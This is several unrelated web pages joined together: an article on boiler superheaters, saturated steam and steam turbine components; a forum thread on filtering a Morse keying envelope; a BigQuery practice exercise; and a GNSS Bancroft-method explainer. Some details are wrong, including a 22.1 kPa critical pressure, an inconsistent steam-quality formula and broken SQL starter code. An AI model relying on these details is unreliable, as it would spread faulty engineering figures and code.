then the last is the Final Secondary Superheater. This design aims to maximize the absorption of radiant heat from combustion inside the furnace. ## Superheater Working Principle Superheater Working Principle – Superheater is a subcritical boiler’s component that heat the saturated vapor, at constant pressure, so it becomes superheated steam. Superheater technology has been used since the use of steam engines early 20th century. The main purpose is to increase the heat energy contained by the steam, so that increasing the thermal efficiency of the engine. Until now the use of superheater is still very popular, especially in large water-tube boiler steam power plant. Picture above is a simplified of a subcritical water-tube boiler. This water-tube boiler is composed by two water tanks on the bottom and top. Both tanks are connected with pipes that we know as the raiser tube. The heat from the combustion will first pass through the raiser tube, heat the water inside the pipe. Water than reaches its saturation point and turns the phase into saturated steam. Saturated steam is still mixed with liquid water so it needs a mechanism to separate the saturated steam with water. This is the function of the top side tank. This tank is commonly known as steam drum. The liquid water will remain in the steam drum and will be recirculated by the raiser tube. While the saturated steam will exit the steam drum and go to the superheater pipes. The superheater pendant will absorb heat by convection and radiation from the flue gas of combustion, until saturated steam dried and become superheated steam. Superheated steam have a greater heat energy content than saturated vapor. Above is a much more complex and modern subcritical boiler scheme. This boiler is very popular used in steam power plants. The concept is not much different from the previous subcritical boiler principle. The superheater components in modern subcritical boilers made into several levels to fulfill the needs of the quality and quantity of superheated steam produced. In the diagram the superheater is shown by red pipes. The subcritical boiler’s combustion chamber is composed of vertical raiser tubes that will circulate the water from and to the steam drum. In modern subcritical boilers, only one water tank is used as a steam drum on the upper side of the boiler. The water in the raiser tube will absorb the heat directly from the combustion process. The water from the raiser tube goes back to the steam drum, and will be separated between the saturated steam phase and the liquid water. Liquid water will be re-circulated through the raiser tube, while the saturated vapor go out to the first stage superheater pipe (primary superheater). Primary superheater is also commonly known as Low Temperature Superheater (LTSH). LTSH pipes absorb heat conventionally from combustion exhaust gases. From LTSH, the steam will pass consecutively the Secondary Superheater Platform, Intermediate Secondary Superheater, and the Final Secondary Superheater. This steam produced by Final Secondary Superheater is called superheated steam or dry vapor. One phase of water that actually gas phase. It contains no moisture at all, and stores very high heat energy, much higher than the saturated vapor. ## What is Saturated Steam? What is Saturated Steam? – Saturated steam is a condition where water vapor is at the equilibrium of pressure and temperature equal to liquid phase water. Saturated steam becomes a phase transition between liquid phase of water to its pure gas phase, or commonly known as superheated steam. When the water is in this phase of transition, there is mixing between the liquid phase of water with gas phase of water (saturated steam) in proportion to the amount of latent heat absorbed by the fluid. Saturated steam begins to form just as the water reaches its boiling point, until all the energy from latent heat is absorbed by water. While all latent heat has been absorbed by water, and the amount of vapor phase has reached almost 100% compared to its liquid phase, that is the end of the phase of saturated steam. The process of reaching almost 100% of the vapor phase occurs at a constant pressure and temperature. Furthermore, if thermal energy continues to be fed to saturated steam, there will be an increase in fluid temperature and encourage steam to turn the phase into superheated steam. According to the water phase diagram above, the phase of saturated steam can only form along the saturated curve. The lower limit of the saturated curve is the triple point, while the upper limit of the curve is the critical point. Water in more than triple-point conditions will not experience a phase of saturated steam. Water that has a pressure above 22.1 kPa, if it continues to be heated will immediately turn the phase into supercritical steam. The mixture between water vapor and liquid water in the saturated steam can be determined in amount by using a saturated steam diagram. This diagram uses pressure as the Y axis and the enthalpy as the X axis. This saturated steam diagram is made of a curve. Half of the curve from the lowest point to the top is called the saturated water curve. This part curve becomes the boundary between liquid water with the saturated steam phase. For the right curve from the top of the curve to the lowest point is called the saturated steam curve. This curve becomes the boundary between the phase of saturated steam and superheated steam phase. Right at the vertex of the curve is a critical point, the same point as the critical point in the phase diagram of water. Since the saturated steam is in constant pressure, a certain amount of saturated steam is represented by a horizontal straight line connecting a point on the saturated water curve to another point on the saturated steam curve. The point on the saturated water curve (hf) shows the enthalpy value of saturated water, ie how much heat energy required for water at pressure P per one unit of mass can reach saturated water. While the point on the saturated steam curve (hg) is the total enthalpy value required so that the water reaches 100% of steam. The simple relationship is: hg – hf = hfg Where: hf = enthalpy saturated water hg = enthalpy saturated steam hfg = difference of enthalpy required saturated water to achieve saturated steam In other cases, the enthalpy value given to water is not as large as hg, ie only by hmix. The hmix point is anywhere along the horizontal line. In this case the saturation vapor is a mixture of vapor with water whose ratio can be easily determined using the following equation: $x=\dfrac{h_{mix}}{h_{fg}}$ So: hmix = hf + x . hfg Where: x = comparison of the amount of water in the overall vapor mixture of saturation hmix = enthalpy mixture ## Steam Turbine Components – All Components in Detail Here I will explain the steam turbine components. 1. Stop Valve The stop valve of the steam turbine serves to isolate the turbine from the steam stream and also to quickly stop the supply of steam to the turbine under certain conditions. For example in case of loss of electrical load at a steam power plant from the the grid – we know it as a load rejection – the stop valve will quickly close in a split second. This is useful for avoiding overspeed on the turbine due to the presence of pressurized steam entering the turbine but no electrical load on the generator. The stop valve opens by the working of the hydraulic actuator and closes by the spring. 2. Control Valve Control Valve is to control the flow of steam into the turbine in accordance with the existing load. In the steam power plant, the control valve opening depends on the amount of electrical load in the generator. 3. Electrohydraulic actuators on Stop and Control Valve The actuators for stop and control valve on steam turbine power plant use the “fail-safe” principle. That is, the valves are opened by the hydraulic actuator and closed by force from the spring. The differences between the stop valve and control valve actuators is on the stop valve does not need to use the valve position sensor as in the control valve. The stop valve uses only a limit switch sensor. 4. Extraction Steam Line and its Check Valve Extraction steam is a steam taken from certain stages in a steam turbine that is used for many things, such as preheating water (feedwater before boiler entry), turbine sealing system, sootblower system, etc. In the pipeline extraction steam shall be installed check valve to prevent backflow from the steam. For example in the case of load rejection above, the flow of water back into the turbine, especially on the side of the superheater turbine will cause a termal stress on the steam turbine components. The check valve is commonly using Swing Check Valve or Power Assisted Swing Check Valve type. Swing Check Valve opens up by the large differences in steam pressure. And in the event of steam flow interuption (as in the case of load rejection) this check valve will close as the result of the weight of the valve itself. While the Power Assisted Swing Check Valve uses additional actuators to close the valve. Otherwise, to open the valve does not need to use the actuator. It will open by the pressure difference of the steam flow in the pipe. 5. Bearing The steam turbine use bearing as a part to reduce friction between the shaft (the rotating part) with the casing (stator). Bearings are equipped with circulating and pressurized lubricating oil. To compensate the gravity of the turbine the journal bearing is used, whereas to compensate for the axial forces arising from the steam flow inside the turbine, thrust bearing is used. 6. Hydraulic Turning Gear It is a mechanism to rotate the turbine rotor at initial start or at the time after shut down to prevent distortion/bending resulting from uncoordinated heating or cooling process on the rotor. This system uses a hydromatic motor whose rotating power comes from a high pressure hydraulic system. 7. Balance Piston Balance Piston on steam turbine is to compensate the emergence of axial forces due to the flow of the steam insidenthe turbine. This component mitigates the work of thrust bearing.
2019-12-09 15:45:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5277091860771179, "perplexity": 1622.8536973279133}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540519149.79/warc/CC-MAIN-20191209145254-20191209173254-00109.warc.gz"}
https://electronics.stackexchange.com/questions/606530/rounding-a-square-waves-corners
# "Rounding" a square wave's corners? I'm trying to create a keying envelope for sending morse code without nasty clicking and the consequential excess bandwidth. My current plan is to take the switching (essentially a square, but not-constant frequency, wave) and "round the corners". To illustrate with a diagram: (1) indicates the keying waveform (2) indicates what I get with a simple RC network, and (3) indicates what I'd like to achieve. The circles highlight the "problem region". In (2) these regions are sharp and will cause clicks and excess bandwidth, in (3) they're a more gentle rate of change. The result needs to be achieved reasonably simply without an excess of components (preferably with passive ones, and certainly without resorting to a CPU and D/A converter--which is the only reliable approach I've managed to think up so far). If it can't be done reasonably simply, I'll just have to live with the clicks, perhaps trying to limit them with output filters on the transmitter to suppress the spurious emissions. I'm fairly sure this doesn't work as a simple low-pass filter; if I just use a simple L-type R/C filter, I get the effect in (2). If I make it an L/C filter, the thing rings like a bell (not really surprising, of course) and does no better. Or perhaps I simply haven't recognized the right time constant for it. Is there a simple approach? I'm starting to suspect there isn't. But, often when I feel that way, I'm just missing the obvious. • Doing this with a passive filter is impossible without inventing time travel, as the filter would be non-causal. Jan 30 at 18:45 • @Hearth: I think you can take the time axis in the sketch to be unimportant. One can certainly round of both corners with a 2nd-order filter. Jan 30 at 18:48 • Useful search terms : Gaussian or Bessel filter. Jan 30 at 19:13 • @Hearth If you can tolerate a small delay, (ideally flat group delay, i.e. same delay on all frequency components), yes you can. Jan 30 at 19:15 • @IanBland with the exception of my answer Jan 31 at 4:37 You need temporal filtering, and that's best achieved by Bessel and Gaussian filters. Bessel has linear phase, Gaussian has the lowest time delay, but in your case Gaussian would be preferred. For both filters approximations are used, because Bessel is $$\\exp(-st)\$$, while the Gaussian is $$\\exp(-t^2)\$$. For your case, both could be implemented with passive filters, but you'll need LC, because simple RC will not do it. One answer suggests using that and, with enough stages you will converge towards a Gaussian, but that will only happen after many stages, whereas the approximation of the Gaussian filter is done, typically, using MacLaurin series. You'll also need a 4th order, or higher, for the best results, because a simple 2nd order will not make the pulses smooth enough. If you're willing to consider the LC approach, you'll have to decide the input and output loads -- that's the sin of the passive filters. For an equally terminated 50 Ω Cauer ladder, you get this set of normalized values -- choose whichever one you want. I used the 2nd because it has the more sensible values for the inductors: [L2=26.49682875264271,L1=112.1909090909091,C2=0.003541405021327631,C1=0.01863151013292656] [L2=35.02617328519855,L1=20.4061135371179,C2=0.005490132961363412,C1=0.04998496692723993] [L2=124.9624060150376,L1=13.72533333333333,C2=0.008162446057605459,C1=0.01401046936172085] [L2=46.57877813504823,L1=8.853512705530642,C2=0.04487636709462672,C1=0.01059873200624362] You can probably find tables for these. The elements are as shown below (with one of the 4 results): The best results would have been achieved with a raised cosine filter, but good luck making that in the analog way. Gaussian is the best option, though, because of its (approximated) symmetrical impulse response, which gives you clean, bandlimited pulses. Note that this is a 4th order and the output is still not as symmetrical as you might want. If you need a 5th or 6th order, your best bet is to find those tables, because I'm trying to solve the equations and wxMaxima keeps on crunching. If you want to add active filtering, then you can use this normalized transfer function and then this site to design each 2nd order section, separately: $$H(s)=\dfrac{3.63465}{s^2+2.83724s+3.63465}\cdot\dfrac{2.80538}{s^2+3.2559s+2.80538}$$ I wanted to continue this yesterday, but it was late. You can have an 8th order Gaussian filter using only one (quad-)opamp. Here is the response of one made with LT1058 (blue), compared to its ideal counterpart (red), driven by a 1 Hz square pulse: The response has a slight overshoot and that's due to the component tolerances and non-idealities of the opamp. It may be slightly worse on the breadboard (those caps will not be all the same). Scaling the values is done very easily: divide them by the frequency. E.g. if your frequency is 1 kHz, either scale the resistors to be 1000x less, or the capacitors. I don't recommend going too low with the resistors because the currents might end up larger than what the opamp can source/sink; about the same thing with the capacitors: don't make them too large because their reactance may get too low and you'll have the same current problem. Common values are 1 kΩ or larger, or 1...10 μF or lesser. The reverse is also true: too large resistors means more noise and offset, too small capacitors means they will be comparable with the opamp's and PCB's parasitics. For brevity, here is the normalized transfer function: \begin{align} H(s)=&\dfrac{7.41638}{s^2+2.99117s+7.41638}\cdot\dfrac{5.55929}{s^2+3.65986s+5.55929} \\ {}&\cdot\dfrac{4.75899}{s^2+4.01438s+4.75899}\cdot\dfrac{4.43336}{s^2+4.17382*s+4.43336} \end{align} As I said in the beginning, from the perspective of the ISI and, thus, the symmetry of the impulse [/edit], Gaussian is what you need here, not Bessel, because Bessel deals with linear phase (flat group delay), which gives slight overshoot when dealing with pulses. Here is an ideal 8th order Bessel (blue) compared to the Gaussian (red) counterpart: As you can see, there is only a slight overshoot (and the delay is slightly greater), so you may be tempted to say "it's fine", until you look at the differences between the (quasi-)real setup and the ideal one, above -- that's when you'll realize that the differences will be amplified. Ultimately, it will be up to the breadboard implementation and that will bring discrepancies between elements that will -- most likely -- make both the Bessel and the Gaussian responses come close enough. Since in the OP there are no special requirements, only some vague notions about pulse shaping, both will make good choices. To show what I mean, here is a Monte Carlo analysis of 100 steps looks like for 1% resistors and 5% capacitors (left), and for 5% resistors and 10% capacitors: Also, here's a random input with pulses of variable widths and how they are filtered by both Bessel (blue) and Gaussian (red) ideal filters, with fc=1.25 Hz: • This looks great, if I can work out the values and match them to the impedances. I will give it a try, thank you! Jan 31 at 1:46 • Considering this is only Morse Code , these recommendations would be very relevant if this question actually had critical specs or one was attempting to null ISI with the most baud/Hz BW. Neither of these conditions exist but might in other examples. I think if Bessel has < 1% overshoot that would not justify declaring it unsuitable considering component tolerance errors on any filter. yet lower damping is better. Jan 31 at 22:11 • @TonyStewartEE75 Re-reading now I realized that my words can be understood to mean dismissal of Bessel, but that's not what I meant to say. So I edited the last paragraph, and added the italicized specification right before the last picture. My English can get awkward sometimes. Feb 1 at 11:47 • That reads much better. I wonder if Nyquist criteria ought to be mentioned for relevance as I eluded to this "The breakpoint should be defined by the desired multiple of the shortest time interval for any Code that you must specify." One never knows if a future criteria is needed for -3dB Bandwidth or -20dB skirt steepness for adjacent channel interference in a narrow band modulation scheme. Just "looking good" might be imprecise yet temporarily adequate or not. Good show on Monte Carlo, yet we know the filter with the lowest Q has the lowest sensitivity to tolerance errors, as Q is gain. Feb 1 at 12:18 • @TonyStewartEE75 In all honesty, if we go down that path we may as well copy-paste a book or two. There's already a good deal of information, given the OP's input. As for the Monte Carlo, that's mostly to give the OP an idea of how it will turn up, compared to the ideal case (in case OP expects a perfect envelope). Feb 1 at 12:59 With the right low pass filter, you can achieve what you are after. For your simple RC, the reason the leading edges of the square wave are so different than the falling edges are because of the differences in the “group delay” vs frequency for this kind of filter. Filters that have more of a constant delay in their passband will have more symmetrical rises and falls. By the way, an RLC filter does not necessarily have ringing, you just designed one too high a “Q”. One kind of low pass filter with a more constant delay in the passband is called a “Bessel” filter. For a single section RLC, this is just a filter with a lower “Q” than a traditional maximally flat filter. If you are willing to use several inductors and several capacitors in your filter, you can design one with a nicer response. • Or an op-amp based 2nd-order lowpass filter. Jan 30 at 18:57 • Filtering with Active LPF circuits are easy with dual or quad Op Amps and RC components. • Using the constant time delay of Bessel Filters are easy to synthesize. ADDED: FALSTAD Circuits> Active Filter> LPF then selected Options Phase> moved sliders to 10Hz, 2 stage. > select all > copy and pasted in http://www.Falstad.com/circuit or http://www.falstad.com/circuit/circuitjs.html > blank circuit or delete it > paste (^V) , then I scaled Rx1k and C/1k (optional) • The breakpoint should be defined by the desired multiple of the shortest time interval for any Code that you must specify. • With Morse Code intervals defined as "dit" "silent space" and "dah", I believe the "dit" is the shortest interval and will vary depending on skill of the sender. • this assumption may be scaled up or down, but let's define the shortest "dit" interval = 100 ms • Let's define the LPF breakpoint as $$\f=1/T_{dit}\$$ with a 4th order Gaussian. (4 caps + 2 Op Amps) Simulation Proof of concept < link fixed Since there was no spec for smooth, there is no acceptance criteria. Linear Phase of Bessel $$\d\phi/df\$$ here yields a flat response for Group Delay of 33 ms up to 10Hz ( then reduces after this) For the keen students of Bessel Filters; https://web.archive.org/web/20140224083044/http://www.rane.com/note147.html • This looks great! Perhaps a tad more complex than I was hoping, but heck, it clearly works and in the big scheme, one LM385 dual op-amp and some passives is not a big deal, thank you! Jan 31 at 1:26 • Did you try the simulation Morse Code switch to see how it feels and looks? Jan 31 at 4:12 • The first link in this answer (to the "simulation proof of concept") is broken. Jan 31 at 14:43 • oops TY @AndersonGreen tinyurl.com/y9w5f8q7 Jan 31 at 22:42 • Sorry I used www/falstad.com/afilter then chose > Filter> active> Bessel> 10 Hz sliders> 2 stage (order=4) then scaled Rx1k and C/1k Added link above @flawr then option add Phase Feb 1 at 22:12 A simple way should be with two integrators with clamped output. I am not sure is this is what you need, anyhow you have to adjust time constants and clamp levels. Rather than switch a constant voltage into an R-C, switch a constant current into a C. Linear Tech and others have driver chips with controlled rise/fall times to reduce emissions. You can do the same with an opamp. Properly done, you will get a symmetrical trapezoid instead of a square wave shape. This does not completely eliminate the corners, but it does reduce the energy in the odd-order harmonics. And as stated elsewhere, an R-L-C filter does not automatically ring. With proper impedance control and damping, you can get the corner modification you want. Tektronics video test gear did this in the 60's. The sync pulses were so pretty, a scope shot looked like an artist's rendering. In (2) these regions are sharp and will cause clicks and excess bandwidth False assumption. You have already limited the high-frequency content of your signal. A second or third order RC filter is still better, but your next stages can do this for you anyway. Playing with phases of different harmonics in the already filtered signal in (2), you can convert your "front sharpness" into "trailing sharpness" or into something in between like waveform (3), without changing the freq/amplitude spectrum at all. Don't believe me? Just get all the phases off by 180° - i.e. play it backwards. On the other hand, if you are really into CW / morse code and your listeners are human, take my word as a medicore telegraphist and please, pretty please, adhere to waveform (2). It is way easier to listen to than (3). Beware of the next stages as well. A typical CW-related circuit tends to carelessly voltage-limit the signal (it is Morse code, isn't it, what can go wrong?) negating your bandwidth-limiting ambitions. This can happen all the way to the final amplifier that feeds the antenna. It is enticing to force it into class D mode and get both power and efficiency "for free" (except for the clicks). (You can even force your final amplifier into class D for the flat part of your dit/dah AND in the same time limit as the clicks, but it requires some fine tuning of the signal levels.) • You need to add even harmonics and shift those phases to round both edges. Yes plot 2 has more BW and thus is easier to detect. (higher SNR yields lower BER.) Feb 1 at 13:01 Stacking 4 buffered RC low pass filters appear to work in that effect. You could use a TL074 chip or similar. I guess that accounts for 4th order filter: I would start in a different direction: use two PWM waves to approximate a sine wave. This article discusses that: walking ring sine wave generator Basically, you generate a three-level rectangular wave. The first overtone is 6x the frequency, so it's easy to filter. You can go farther and use 4 PWM outputs; the first overtone is 10x the freq. There's lots of interesting articles from a search for "ring counter sine wave generator". The best is Don Lancasters article here (from 1976!) : https://www.tinaja.com/glib/rad_elec/digital_sinewaves_11_76.pdf • I'm probably missing something here, but the "original square wave" (i.e. element (1) in my diagram is hand-generated morse code. Does your proposal relate to that? Thanks anyway, I'm loving (although more than slightly overwhelmed by) the discussions that I'm learning so much from. Feb 1 at 18:11 • No, you are correct... somehow I went from that to "make sine waves". (which I also want to do to make Morse code). My screw-up. I apologize for the answer to the wrong problem! :-/ Feb 3 at 2:26
2022-08-14 23:58:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 6, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6544052958488464, "perplexity": 1590.9403022247386}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572089.53/warc/CC-MAIN-20220814234405-20220815024405-00449.warc.gz"}
https://www.practiceprobs.com/problemsets/google-bigquery/advanced/sniffed-it/
# Sniffed It¶ You operate a forum discussing dogs called Sniffed It posts | id | created_at | title | |---:|:------------------------|:---------------------------------| | 1 | 2008-12-25 15:30:00 UTC | Chores Your Dog Can Do | | 2 | 2009-05-15 12:30:00 UTC | Teach Your Dog To Find Your Keys | | id | created_at | post_id | content | |---:|:------------------------|--------:|:---------------------------------------| | 11 | 2008-12-25 15:35:00 UTC | 1 | This is ridiculous | | 22 | 2009-05-15 12:39:00 UTC | 2 | I'm not going to soak my keys in gravy | | 33 | 2008-12-25 15:48:00 UTC | 1 | Finally my dog is pulling his weight | Combine them into one table, such that comments are repsented as an array of structs, like this expected | id | created_at | title | comments.id | comments.created_at | comments.content | |---:|:------------------------|---------------------------------:|------------:|:------------------------|:---------------------------------------| | 1 | 2008-12-25 15:30:00 UTC | Chores Your Dog Can Do | 11 | 2008-12-25 15:35:00 UTC | This is ridiculous | | | | | 33 | 2008-12-25 15:48:00 UTC | Finally my dog is pulling his weight | | 2 | 2009-05-15 12:30:00 UTC | Teach Your Dog To Find Your Keys | 22 | 2009-05-15 12:39:00 UTC | I'm not going to soak my keys in gravy | ## Starter code¶ WITH posts AS ( SELECT 1 AS id, TIMESTAMP("2008-12-25 15:30:00+00") AS created_at, "Chores Your Dog Can Do" AS title UNION ALL SELECT 2 AS id, TIMESTAMP("2009-05-15 12:30:00+00") AS created_at, ), SELECT 11 AS id, TIMESTAMP("2008-12-25 15:35:00+00") AS created_at, 1 AS post_id, "This is ridiculous" AS content, UNION ALL SELECT 22 AS id, TIMESTAMP("2009-05-15 12:39:00+00") AS created_at, 2 AS post_id, "I'm not going to soak my keys in gravy" AS content UNION ALL SELECT 33 AS id, TIMESTAMP("2008-12-25 15:48:00+00") AS created_at, 1 AS post_id, "Finally my dog is pulling his weight" AS content )
2023-02-06 15:34:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1818615198135376, "perplexity": 13011.780165920387}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500356.92/warc/CC-MAIN-20230206145603-20230206175603-00281.warc.gz"}
https://gssc.esa.int/navipedia/index.php/Bancroft_Method
If you wish to contribute or participate in the discussions about articles you are invited to join Navipedia as a registered user # Bancroft Method Fundamentals Title Bancroft Method Author(s) J. Sanz Subirana, J.M. Juan Zornoza and M. Hernández-Pajares, Technical University of Catalonia, Spain. Year of Publication 2011 The Bancroft method allows obtaining a direct solution of the receiver position and the clock offset, without requesting any "a priori" knowledge for the receiver location. ## Raising and resolution Let $PR^j$ the prefit-residual of satellite-$j$, computed from equation (1) $R^j=\rho^j+c(\delta t-\delta t^j)+T^j+\hat{\alpha}\, I^j+TGD^j+\mathcal{M}^j+{\boldsymbol \varepsilon}^j \qquad \mbox{(1)}$ after removing all model terms not needing the a priory knowledge of the receiver position:[footnotes 1] $PR^j\equiv R^j +c\,\delta t^j-TGD^j \qquad \mbox{(2)}$ Thence, neglecting the tropospheric and ionospheric terms, as well as the multipath and receiver noise, the equation (3) $\begin{array}{r} R^j-D^j\simeq \sqrt{(x^j-x)^2+(y^j-y)^2+(z^j-z)^2}+c\,\delta t\\[0.3cm] j=1,2,...,n~~~~ (n \geq 4)\\ \end{array} \qquad \mbox{(3)}$ can be written as: $PR^j = \sqrt{(x^j-x)^2+(y^j-y)^2+(z^j-z)^2}+c \, \delta t \qquad \mbox{(4)}$ Developing the previous equation (4), it follows: $\left[{x^j}^2+{y^j}^2+{z^j}^2-{PR^j}^2 \right]-2 \left[x^j x+y^j y+z^j z-{PR^jc\,\delta t} \; \right] + \left[x^2+y^2+z^2-(c\,\delta t)^2 \right]=0 \qquad \mbox{(5)}$ Then, calling ${\mathbf r}=[x,y,z]^T$ and considering the inner product of Lorentz [footnotes 2] the previous equation (5) can be expressed in a more compact way as: $\frac{1}{2} \left \langle \left[ \begin{array}{c} {\mathbf r}^j\\ PR^j\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}^j\\ PR^j\\ \end{array} \right] \right \rangle - \left \langle \left[ \begin{array}{c} {\mathbf r}^j\\ PR^j\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] \right \rangle + \frac{1}{2} \left \langle \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] \right \rangle =0 \qquad \mbox{(6)}$ The former equation can be raised for every satellite (or prefit-residual $PR^j$). If four measurements are available, thence, the following matrix can be written, containing all the available information on satellite coordinates and pseudoranges (every row corresponds to a satellite): ${\mathbf B}= \left( \begin{array}{cccc} x^1&y^1&z^1&PR^1\\ x^2&y^2&z^2&PR^2\\ x^3&y^3&z^3&PR^3\\ x^4&y^4&z^4&PR^4\\ \end{array} \right) \qquad \mbox{(7)}$ Then, calling: $\Lambda= \frac{1}{2} \left \langle \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] \right \rangle \; , \; {\mathbf 1}= \left[ \begin{array}{c} 1\\ 1\\ 1\\ 1\\ \end{array} \right] \; , \; {\mathbf a}= \left[ \begin{array}{c} a_1\\ a_2\\ a_3\\ a_4\\ \end{array} \right] \; \mbox{being} \; \; a_j= \frac{1}{2} \left \langle \left[ \begin{array}{c} {\mathbf r}^j\\ PR^j\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}^j\\ PR^j\\ \end{array} \right] \right \rangle \qquad \mbox{(8)}$ The four equations for pseudorange can be expressed as: ${\mathbf a} -{\mathbf B}\,{\mathbf M} \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] +\Lambda \; {\mathbf 1}=0\;\;,\;\;\;\; \mbox{being} \;\;\;\;\;\; {\mathbf M}=\left( \begin{array}{cccc} 1&0&0&0\\ 0&1&0&0\\ 0&0&1&0\\ 0&0&0&-1\\ \end{array} \right) \qquad \mbox{(9)}$ from where: $\left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] ={\mathbf M} {\mathbf B}^{-1} (\Lambda \; {\mathbf 1} + {\mathbf a}) \qquad \mbox{(10)}$ Then, taking into account the following equality $\langle {\mathbf M}{\mathbf g},{\mathbf M}{\mathbf h} \rangle=\langle {\mathbf g},{\mathbf h} \rangle \qquad \mbox{(11)}$, and that $\Lambda= \frac{1}{2} \left \langle \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right], \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] \right \rangle \qquad \mbox{(12)}$, from the former expression (10), one obtains: $\left \langle {\mathbf B}^{-1} {\mathbf 1}, {\mathbf B}^{-1} {\mathbf 1} \right \rangle \Lambda^2+ 2\left [ \left \langle {\mathbf B}^{-1} {\mathbf 1}, {\mathbf B}^{-1} {\mathbf a} \right \rangle -1 \right ] \Lambda + \left \langle {\mathbf B}^{-1} {\mathbf a}, {\mathbf B}^{-1} {\mathbf a} \right \rangle =0 \qquad \mbox{(13)}$ The previous expression (13) is a quadratic equation in $\Lambda$ (note that matrix ${\mathbf B}$ and the vector $\mathbf a$ are also known) and provides two solutions, that introduced in expression (10) provides the searched solution: $\left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] \qquad \mbox{(14)}$. The other solution is far from the earth surface. ## Generalisation to the case of $n$-measurements: If more than four observations are available, the matrix ${\mathbf B}$ is not square. However, multiplying by ${\mathbf B}^T$, one obtains (Least Squares solution): ${\mathbf B}^T{\mathbf a} -{\mathbf B}^T {\mathbf B}\,{\mathbf M} \left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] +\Lambda \; {\mathbf B}^T {\mathbf 1}=0 \qquad \mbox{(15)}$ where: $\left[ \begin{array}{c} {\mathbf r}\\ c\,\delta t\\ \end{array} \right] ={\mathbf M} ({\mathbf B}^T {\mathbf B})^{-1}{\mathbf B}^T(\Lambda \; {\mathbf 1} + {\mathbf a}) \qquad \mbox{(16)}$ and then: $\begin{array}{r} \left \langle ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf 1}, ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf 1} \right \rangle \Lambda^2+ 2\left [ \left \langle ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf 1}, ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf a} \right \rangle -1 \right ] \Lambda +\\[0.3cm] + \left \langle ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf a}, ({\mathbf B}^T {\mathbf B})^{-1} {\mathbf B}^T{\mathbf a} \right \rangle =0 \end{array} \qquad \mbox{(17)}$ ## Notes 1. ^ The tropospheric and ionospheric terms, $T^j$ and $\hat{\alpha} \,I^j$, can not be included, because the need to consider the satellite-receiver ray. Off course, after an initial computation of the receiver coordinates, the method could be iterated using the ionospheric and tropospheric corrections to improve the solution. 2. ^ $\left \langle{\mathbf a},{\mathbf b}\right \rangle={\mathbf a}^{t} \; {\mathbf M} \; {\mathbf b}= \left[ \begin{array}{c} a_1,a_2,a_3,a_4 \end{array} \right] \left( \begin{array}{cccc} 1&0&0&0\\ 0&1&0&0\\ 0&0&1&0\\ 0&0&0&-1\\ \end{array} \right) 